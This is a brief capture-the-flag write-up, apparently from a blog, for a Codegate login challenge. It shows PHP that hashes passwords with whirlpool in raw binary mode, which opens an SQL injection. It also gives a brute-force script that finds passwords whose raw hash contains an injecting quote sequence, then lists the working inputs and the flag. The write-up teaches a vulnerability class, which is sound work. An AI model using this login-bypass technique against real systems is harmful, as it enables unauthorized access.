We were given the source code of this challenge. To get the flag we have to login as 'admin'. Below is the php code:
$flag = "/flag.txt"; $id = $_POST['user_id']; $ps = $_POST['password']; mysql_connect("localhost","codegate","codegate"); mysql_select_db("codegate"); $id = mysql_real_escape_string($id); $ps = mysql_real_escape_string($ps); $ps = hash("whirlpool",$ps, true); $result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'"); $row = mysql_fetch_assoc($result); if (isset($row['user_id'])) { if ($row['user_id'] == "admin") { echo "hello, admin<br />"; die(file_get_contents($flag)); } else { die("hello, ".$row['user_id']); } } else { msg("login failed.."); }The issue with code is that hash() function which outputs raw binary data leading to SQL injection.
string hash ( string $algo , string $data [, bool $raw_output = false ] ) raw_input: When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.To bypass the login, we need to find a value that when hashed with whirlpool results in string containing '='
<?php for($i=0 ;$i<10000000; $i++) if(strpos(hash("whirlpool",$i, true),"'='") !== false) echo $i."\n"; ?>
[ctf@renorobert CodeGate]# php brute.php 364383 527980 629987 708365 991410 1311789 1608604 1974557 ^CLogging in with the above passwords results in login bypass. The flag for the challenge is DAER0NG_DAER0NG_APPLE_TR33
No comments :
Post a Comment